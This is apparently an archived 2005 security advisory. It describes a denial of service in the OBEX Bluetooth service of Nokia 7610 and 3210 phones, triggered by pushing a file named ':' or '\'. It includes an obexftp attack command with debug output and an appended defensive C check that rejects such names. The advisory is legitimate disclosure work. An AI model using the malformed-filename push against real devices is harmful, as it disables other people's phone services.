Nokia 7610, 3210 denial of service in OBEX.

From: A. Ramos (aramosf_at_unsec.net)
Date: 09/26/05

    Date: Mon, 26 Sep 2005 19:58:53 +0200
    To: aramosf@unsec.net
    
    
    

    Title: Nokia 7610, 3210 Denial of Service in OBEX.
    Severity: Low
    Affected: tested on Nokia 7610 and Nokia 3210 (maybe other Symbian
    phones).
    Problem type: remote

    Details:
    ----------------------------------------------------------------------------------------------------------

    There is a flaw in the OBEX implementation in the Nokia 7610 (V4.0.437
    15-09-04 RH51), and others, that disables this service if you send a
    file named ":" or "\".

    ----
     Quote from IROBEX12.pdf, page 40, section 4.3 (OBEX specification):
    "Pushing objects into the inbox Objects are pushed into the inbox by using 
    the PUT command with a Name header. The string in the Name header 
    should not contain any path characters such as :, / or \. Objects with
    improperly formed names should be rejected."
    ----
    The device asks for a PIN if you are not paired, or asks whether you
    want to accept a connection from the remote box; you need to ACCEPT.
    The risk is low, because it doesn't work if you don't accept the
    incoming connection.
    If the connection is established, the file is sent and there is no "New
    message arrived" message, as there is when you send a correct file.
    That's OK, the filename is dropped.
    The problem is that the OBEX service doesn't work anymore after this: if
    you try to send another file, or a vCard from another device, you can't
    connect to the remote OBEX service again.
    Demonstration with Linux as client:
    jim:~# hcitool scan
    Scanning ...
    	00:13:70:5E:1F:01	7610
    jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
    Browsing 00:13:70:5E:1F:01 ...
    Channel: 10
    No custom transport
    obexftp_cli_open()
    obexftp_cli_connect_uuid()
    Connecting...obexftp_cli_connect_uuid() BT 1
    cli_sync_request()
    obexftp_sync()
    client_done()
    client_done() Found connection number: -1022384746
    client_done() Sender identified
    obexftp_sync() OBEX_HandleInput = 31
    obexftp_sync() Done success=1
    done
    Sending ":"... obexftp_put_file() Sending : -> :
    build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
    cli_sync_request()
    cli_fillstream_from_file()
    cli_fillstream_from_file() Read 6 bytes
    cli_fillstream_from_file()
    cli_fillstream_from_file() Read 0 bytes
    obexftp_sync()
    obexftp_sync() OBEX_HandleInput = 0
    failed: :
    obexftp_cli_disconnect()
    Disconnecting...cli_sync_request()
    failed: disconnect
    obexftp_cli_close()
    # Error pushing another file after sending the ":" filename:
    jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
    Browsing 00:13:70:5E:1F:01 ...
    Channel: 10
    No custom transport
    obexftp_cli_open()
    obexftp_cli_connect_uuid()
    Connecting...obexftp_cli_connect_uuid() BT -1
    failed: connect
    Still trying to connect
    obexftp_cli_connect_uuid()
    Connecting...obexftp_cli_connect_uuid() BT -1
    failed: connect
    Still trying to connect
    obexftp_cli_connect_uuid()
    Connecting...obexftp_cli_connect_uuid() BT -1
    failed: connect
    Still trying to connect
    ----------------------------------------------------------------------------------------------------------
    Timeline:
    20 Sept 2005: bug found.
    21 Sept 2005: Nokia security contacted.
    24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
    26 Sept 2005: Full disclosure.
    --
    A. Ramos.
    mailto: <aramosf@unsec.net>
    http://www.unsec.net 
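
An added example, not part of the original advisory and not Nokia's code: a stateless C check that an OBEX server could apply to a single-packet inbox PUT, rejecting Name headers that contain ":", "/" or "\" as section 4.3 of the specification asks. The function names, the constructed sample packets and the choice of Bad Request (0xC0) as the rejection code are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define OBEX_HDR_NAME    0x01 /* Name header: UTF-16BE text, NUL-terminated */
#define OBEX_RSP_SUCCESS 0xA0 /* final-bit response codes */
#define OBEX_RSP_BAD_REQ 0xC0 /* assumption: the spec only says "rejected" */

/* 1 if the name is non-empty, terminated and has no ':', '/' or backslash. */
static int name_is_safe(const uint8_t *p, size_t len) {
    if (len < 4 || len % 2 || p[len - 2] || p[len - 1]) return 0;
    for (size_t i = 0; i + 2 < len; i += 2) {
        uint16_t c = (uint16_t)((p[i] << 8) | p[i + 1]);
        if (c == 0 || c == ':' || c == '/' || c == '\\') return 0;
    }
    return 1;
}

/* Response code for a single-packet inbox PUT; stateless by design. */
int obex_check_put(const uint8_t *pkt, size_t n) {
    int seen_name = 0;
    if (n < 3 || (pkt[0] & 0x7F) != 0x02) return OBEX_RSP_BAD_REQ;
    if ((((size_t)pkt[1] << 8) | pkt[2]) != n) return OBEX_RSP_BAD_REQ;
    for (size_t off = 3, hlen = 0; off < n; off += hlen) {
        uint8_t hi = pkt[off];
        if ((hi & 0xC0) == 0x80) hlen = 2;        /* 1-byte value */
        else if ((hi & 0xC0) == 0xC0) hlen = 5;   /* 4-byte value */
        else {                                    /* 2-byte length prefix */
            if (n - off < 3) return OBEX_RSP_BAD_REQ;
            hlen = ((size_t)pkt[off + 1] << 8) | pkt[off + 2];
            if (hlen < 3) return OBEX_RSP_BAD_REQ;
        }
        if (hlen > n - off) return OBEX_RSP_BAD_REQ;  /* header overruns packet */
        if (hi == OBEX_HDR_NAME) {
            if (!name_is_safe(pkt + off + 3, hlen - 3)) return OBEX_RSP_BAD_REQ;
            seen_name = 1;
        }
    }
    return seen_name ? OBEX_RSP_SUCCESS : OBEX_RSP_BAD_REQ;
}

/* Constructed sample packets: PUT (0x82), Name header, End-of-Body "x". */
static const uint8_t PUT_OK[]    = {0x82,0,14, 0x01,0,7, 0,'a',0,0, 0x49,0,4,'x'};
static const uint8_t PUT_COLON[] = {0x82,0,14, 0x01,0,7, 0,':',0,0, 0x49,0,4,'x'};

int main(void) {
    printf("%02X %02X\n", obex_check_put(PUT_OK, 14), obex_check_put(PUT_COLON, 14));
    return 0;
}
```

Because the check keeps no state and always returns a response code, a rejected push leaves nothing behind that could affect the next connection.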
    
    


